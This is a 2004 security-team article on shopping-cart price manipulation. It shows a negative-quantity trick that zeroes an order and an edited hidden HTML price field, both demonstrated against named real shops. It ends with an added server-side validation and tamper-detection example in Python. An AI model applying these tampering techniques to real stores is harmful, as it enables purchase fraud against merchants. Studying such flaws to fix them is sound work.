Manipulation of the price of goods in some shopping carts

################################################################################
@                                                                              @
@                        :: LwB Security Team ::                               @
@                                                                              @
################################################################################
# - written by durito                                                          #
# - e-mail: [email protected]                                                  #
# - http://www.lwbteam.org                                                     #
# - date: 28/01/2004                                                           #
# - comments: the information is provided for reference only and is intended  #
#   as a help for administrators. This article is not a guide to action. We    #
#   are not responsible for damage caused by readers of this article, nor for  #
#   illegal use of the information provided by us.                             #
################################################################################

-= Manipulation of the price of goods in some shopping carts =-
***************************************************************

The vulnerabilities I want to talk about today are not new, but despite this,
some of the new e-commerce systems appearing on the network are still subject to them.

I'll start with the old bug: the shopping cart script does not validate the
quantity field of the purchased goods. A vivid example of this vulnerability
is the shopping cart at http://www.memoryworld.net.
Suppose that we choose from the product catalog COMPACT FLASH CARD (3.3/5V) 128M
- COMPACT FLASH CARD (3.3/5V) 128M MEMORY CARD at $55.00 for 1 piece.
The item is now in our shopping cart, and we could pay for it. But, let's say, we
decide to order one more COMPACT FLASH CARD (3.3/5V) 128M - COMPACT FLASH
CARD (3.3/5V) 128M MEMORY CARD, only this time in the quantity field we enter
not 1 but -1. As a result, when the cart recalculates the goods it asks us to pay
$55.00 - $55.00 = $0.00
Like this:

Description                                                         Quantity  Price    Total Price
Peripherals - COMPACT FLASH CARD (3.3/5V) 128M - COMPACT FLASH CARD
(3.3/5V) 128M MEMORY CARD                                              -1     $55.00   ($55.00)
Peripherals - COMPACT FLASH CARD (3.3/5V) 128M - COMPACT FLASH CARD
(3.3/5V) 128M MEMORY CARD                                               1     $55.00    $55.00
Total                                                                                    $0.00

Naturally, no one will ship you 2 COMPACT FLASH CARDs for $0.00, but if you approach
the matter competently, reducing the price of the goods is, in principle, realistic.

The second example of a poorly written electronic shopping cart is given to us by the shop at
Http://ssl.adgrafix.com/cgi-bin/checkitout/checkitout.cgi?theorangSTORE:CKIE:home+
In this case the price of the product is stored in hidden fields of the HTML code, and it can be changed.
Here is a fragment of the code:
---------------
<TD vAlign=top width="80%">
<FONT face="Arial, Helvetica" color=black>California Valencia Oranges</FONT>
<INPUT type=hidden value="California Valencia Oranges" name=name><BR>
<FONT face="Arial, Helvetica" color=black>
<B>$29.99 New Low Price Includes Standard S&amp;H.</B>
<INPUT type=hidden value="29.99 New Low Price Includes Standard S&amp;H."
name=price></FONT>
<FONT face="Arial, Helvetica" color=black size=-1><BR><BR>
<FONT face="Arial, Helvetica" color=black size=-1><CENTER>
<FONT color=#389c38 size=4>
<B><FONT color=#ff0000 size=4>
We will be shipping our CA Valencia Oranges Now through September!! Order Today!!
</FONT></CENTER></B></FONT>
----------------
Here is the hidden field with the price:
------
<INPUT type=hidden value="29.99 New Low Price Includes Standard S&amp;H."
name=price>
------
It can be changed to:
---
<INPUT type=hidden value="0.99 New Low Price Includes Standard S&amp;H."
name=price>
---

And the transaction goes through at that price.
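Both bugs above have the same root cause: the server trusts what the browser posts, whether that is the quantity (-1) or the price in a hidden field. The following is an added example of how a cart should price an order on the server side; it is not code from the article or from either shop. The catalog, SKUs, prices and the MAX_QTY cap are constructed for illustration. The quantity is accepted only as a positive integer, and the total is computed from the server's own catalog, with a client-supplied price used solely to raise a tamper alert.

```python
from decimal import Decimal, InvalidOperation

# Constructed server-side catalog (assumed prices for illustration, not the
# real shops' data). The catalog is the only source of truth for a price;
# nothing the browser submits can change it.
CATALOG = {
    "cf-128m": Decimal("55.00"),   # a memory card like the first example
    "oranges": Decimal("29.99"),   # an item like the hidden-field example
}

MAX_QTY = 100  # assumed per-line cap; negative or absurd quantities are rejected


class CartError(ValueError):
    """Raised for any cart line the server refuses to price."""


def parse_quantity(raw):
    """Accept only a positive integer within [1, MAX_QTY].

    str.isdigit() rejects "-1", "+1", "1.5", "1e3", "" and non-numeric text,
    so a leading minus sign never reaches int().
    """
    if not isinstance(raw, str) or not raw.strip().isdigit():
        raise CartError("invalid quantity: %r" % (raw,))
    qty = int(raw.strip())
    if not 1 <= qty <= MAX_QTY:
        raise CartError("quantity out of range: %d" % qty)
    return qty


def _client_price(raw):
    """Parse a client-submitted price purely so a mismatch can be reported."""
    try:
        return Decimal(str(raw))
    except InvalidOperation:
        return None


def price_cart(lines):
    """Price a cart from the server-side catalog.

    lines: list of dicts as posted by the browser, e.g.
           {"sku": "cf-128m", "qty": "1", "price": "0.99"}.
    Returns (total, alerts). The submitted 'price' is never used for the
    total; it is only compared with the catalog so tampering can be alerted on.
    """
    total = Decimal("0.00")
    alerts = []
    for line in lines:
        sku = line.get("sku")
        if sku not in CATALOG:
            raise CartError("unknown item: %r" % (sku,))
        qty = parse_quantity(line.get("qty", ""))
        unit = CATALOG[sku]
        if "price" in line and _client_price(line["price"]) != unit:
            alerts.append("price tamper on %s: client sent %r, catalog says %s"
                          % (sku, line["price"], unit))
        total += unit * qty
    return total, alerts


if __name__ == "__main__":
    # Constructed requests mirroring the two cases described in the article.
    try:
        price_cart([{"sku": "cf-128m", "qty": "1"},
                    {"sku": "cf-128m", "qty": "-1"}])
    except CartError as exc:
        print("rejected:", exc)   # the -1 line never reaches the total
    total, alerts = price_cart([{"sku": "oranges", "qty": "1",
                                 "price": "0.99 New Low Price Includes Standard S&H."}])
    print("charged:", total)      # 29.99, taken from the catalog
    for alert in alerts:
        print("alert:", alert)
```

The alert list is the detection hook: a hidden-field price that disagrees with the catalog is not a user error to show on the page, it is a signal to log with the session and source address, because it only appears when someone edited the form.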

Yours, Durito.
_________________
EAT THE RICH!